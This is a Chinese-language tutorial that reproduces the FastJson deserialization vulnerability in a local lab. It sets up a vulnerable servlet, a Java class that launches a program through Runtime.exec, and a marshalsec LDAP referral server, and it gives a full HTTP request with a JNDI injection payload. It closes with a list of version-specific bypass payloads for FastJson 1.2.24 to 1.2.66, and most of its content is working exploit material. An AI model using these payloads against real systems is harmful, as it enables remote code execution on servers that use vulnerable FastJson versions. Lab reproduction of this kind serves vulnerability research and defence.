FastJson反序列化漏洞复现附带多个版本的payload
1.漏洞环境搭建
- 打开IDEA,新建一个java web的项目
- 修改HelloServlet.java文件输入一下代码
protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { resp.setContentType("text/html"); StringBuffer jb = new StringBuffer(); String line = null; try { BufferedReader reader = req.getReader(); while ((line = reader.readLine()) != null) jb.append(line); System.out.println(jb); } catch (Exception e) { /*report an error*/ } try { JSON.parseObject(String.valueOf(jb)); } catch (Exception e) { e.printStackTrace(); } } - 发现没有fastjson包,修改pom.xml文件在<dependencies>下面添加如下代码
<dependency>
<groupId>com.alibaba</groupId>
<artifactId>fastjson</artifactId>
<version>1.2.47</version>
</dependency>
注意每次换版本的时候要清理一下mevan缓存,不知道怎么清理百度一下
2.攻击环境搭建
- 下载相应的工具:
marshalsec下载地址:https://github.com/frohoff/marshalsec
phpstudy下载地址:https://www.xp.cn/ - 运行apache服务在phpstudy的WWW目录下面创建一个Exploit.java的文件(让机器执行的代码,这里先由自动打开计算器来演示),代码如下:
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
public class Exploit{
static{
System.err.println("Pwned");
try{
String[] cmd = {"calc"};
java.lang.Runtime.getRuntime().exec(cmd).waitFor();
}catch(Exception e){
e.printStackTrace();
}
}
}
- 使用jdk8的javac的版本生成class文件
javac Exploit.java - 使用mvn工具打包marshalec,进入marshalsec目录使用mvn命令如下
mvn clean package -DskipTests
打包完成之后会在target里面出现.jar的文件 - 执行如下命令开启ldap服务
java -cp .\marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1/#Exploit"
3.攻击步骤
这里以1.2.47为例
1.对漏洞页面进行抓包,修改content-type为application/json,具体数据如下:
POST /demo1_war_exploded/hello-servlet HTTP/1.1
Host: 192.168.43.73:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 115
{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://127.0.0.1:1389/Exploit","autoCommit":true}};
- 配置好tomcat运行即可
- 运行成功后会自动打开,在URL后面添加/hello-servlet即可
- 运行之后就会看到电脑会弹出一个计算器
注意:如果要试验多个版本的payload可以修改pom.xml里面的fastjson的版本号,记得清楚mevan缓存
4.各个Fastjson版本的payload
下面%s是替换写入你的rmi或者ldap的链接
x<=1.2.24:
{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"%s","autoCommit":true}};
1.2.41
{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"%s", "autoCommit":true}
1.2.42
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"%s", "autoCommit":true}
1.2.43
{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"%s", "autoCommit":true}
1.2.45
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"%s"}}
1.2.47
{"a":{"@type": "java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName":"%s","autoCommit":true}}
1.2.62
{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"%s"}
1.2.66
{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"%s"}